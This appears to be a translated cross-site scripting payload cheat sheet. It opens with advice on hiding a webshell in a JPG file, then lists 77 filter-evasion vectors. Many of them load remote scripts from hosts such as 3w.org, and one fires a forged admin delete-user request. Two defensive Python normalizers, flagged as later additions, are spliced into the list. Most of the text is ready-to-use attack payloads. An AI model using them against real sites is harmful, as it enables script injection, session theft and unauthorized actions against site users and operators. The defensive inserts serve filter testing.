Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the webshell, then change the webshell to JPG image format; when the image-format shell is requested, our shell still executes.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (the fragments must all be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added in front (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
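The case, tab, newline, carriage-return, leading-space and entity-encoded variants in (4), (5), (8) to (14), (19) and (47) all slip past a literal "javascript:" substring filter. As an added example (not part of the original post), the Python below normalizes an attribute value roughly the way a browser does before checking the scheme; the sample values are constructed from the items above.

```python
import html

# Code points 0-32 (controls plus space) and 127 are removed: items (11)-(14) and (19)
# use tab, newline, carriage return and leading spaces, and item (47) names the
# 1-32 range. This is a deliberate over-approximation for a detector, not a browser model.
_STRIP = set(range(0, 33)) | {127}

def normalize_url_attr(value: str) -> str:
    """Roughly what a browser does to a URL attribute before it picks a scheme:
    decode HTML entities (with or without a trailing semicolon, as in items 9 and 10),
    drop control characters and whitespace, then lower-case."""
    decoded = html.unescape(value)
    cleaned = "".join(ch for ch in decoded if ord(ch) not in _STRIP)
    return cleaned.lower()

def is_script_url(value: str) -> bool:
    """True when the value would run as script (javascript: or vbscript:, items 3 and 40)."""
    return normalize_url_attr(value).startswith(("javascript:", "vbscript:"))

def naive_filter_blocks(value: str) -> bool:
    """The kind of check that fails: a literal, case-sensitive substring match."""
    return "javascript:" in value

# Constructed samples modelled on the items above (not taken from any live site).
SAMPLES = [
    "javascript:alert('XSS')",                      # (3) plain
    "JaVaScRiPt:alert('XSS')",                      # (4) mixed case
    "jav\tascript:alert('XSS');",                   # (11) embedded tab
    "jav&#x09;ascript:alert('XSS');",               # (12) entity-encoded tab
    "jav\nascript:alert('XSS');",                   # (13) newline
    "jav\rascript:alert('XSS');",                   # (14) carriage return
    " javascript:alert('XSS');",                    # (19) leading space
    "&#106;&#97;&#118;&#97;script:alert('XSS')",    # (8) decimal entities
    "&#x6A&#x61&#x76&#x61script:alert('XSS')",      # (10) hex entities, no semicolons
    "http://3w.org/XSS/xss.js",                     # benign external URL
]

def audit(samples=SAMPLES):
    """For each sample: (value, naive filter caught it?, normalized check caught it?)."""
    return [(s, naive_filter_blocks(s), is_script_url(s)) for s in samples]

if __name__ == "__main__":
    for value, naive, normalized in audit():
        print(f"naive={naive!s:5} normalized={normalized!s:5} {value!r}")
```

The naive check catches only two of the nine script URLs; the normalized check catches all nine and still passes the benign URL.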

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS gets filtered, you can put the JS code inside an image and use that instead
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can run arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal (dword) IP
<A HREF="http://3232235521">XSS</A>

(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
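The hosts in (70) to (73) are the same addresses written in forms that a string comparison against "127.0.0.1" or a hostname allowlist never matches. The Python below is an added example (not part of the original post) that folds dword, hex, octal and mixed forms back to a dotted quad using the classic inet_aton rules; the test hosts are the page's own, and the tab in the last one is the separator from item (73).

```python
from typing import Optional

def _parse_part(part: str) -> int:
    """One dotted component under inet_aton's prefix rules: 0x = hex, leading 0 = octal."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def normalize_ipv4_host(host: str) -> Optional[str]:
    """Fold a host written in dword, hex, octal or mixed notation (items 70-73)
    back to a dotted quad. Returns None when it is not a numeric IPv4 host."""
    # Item (73) splits the host with tabs; drop the separators a browser ignores.
    host = "".join(ch for ch in host if ch not in "\t\r\n ")
    if not host.isascii() or not host.replace(".", "").isalnum():
        return None
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or "" in parts:
        return None
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    *head, last = values
    if any(v > 255 for v in head):
        return None
    tail_bytes = 4 - len(head)            # the last component fills the remaining bytes
    if last >= 1 << (8 * tail_bytes):
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << (8 * tail_bytes)) | last
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def same_address(host_a: str, host_b: str) -> bool:
    """Compare two numeric hosts after normalization; False if either is not numeric."""
    a, b = normalize_ipv4_host(host_a), normalize_ipv4_host(host_b)
    return a is not None and a == b

# The page's own hosts from items (68) and (70)-(73).
PAGE_HOSTS = ["127.0.0.1", "3232235521", "0xc0.0xa8.0x00.0x01",
              "0300.0250.0000.0001", "6\t6.000146.0x7.147"]

if __name__ == "__main__":
    for h in PAGE_HOSTS:
        print(f"{h!r:28} -> {normalize_ipv4_host(h)}")
```

Items (70) to (72) all resolve to 192.168.0.1 and the mixed form in (73) to 66.102.7.147, so any allow- or block-list check must compare the normalized address, not the literal text.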

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>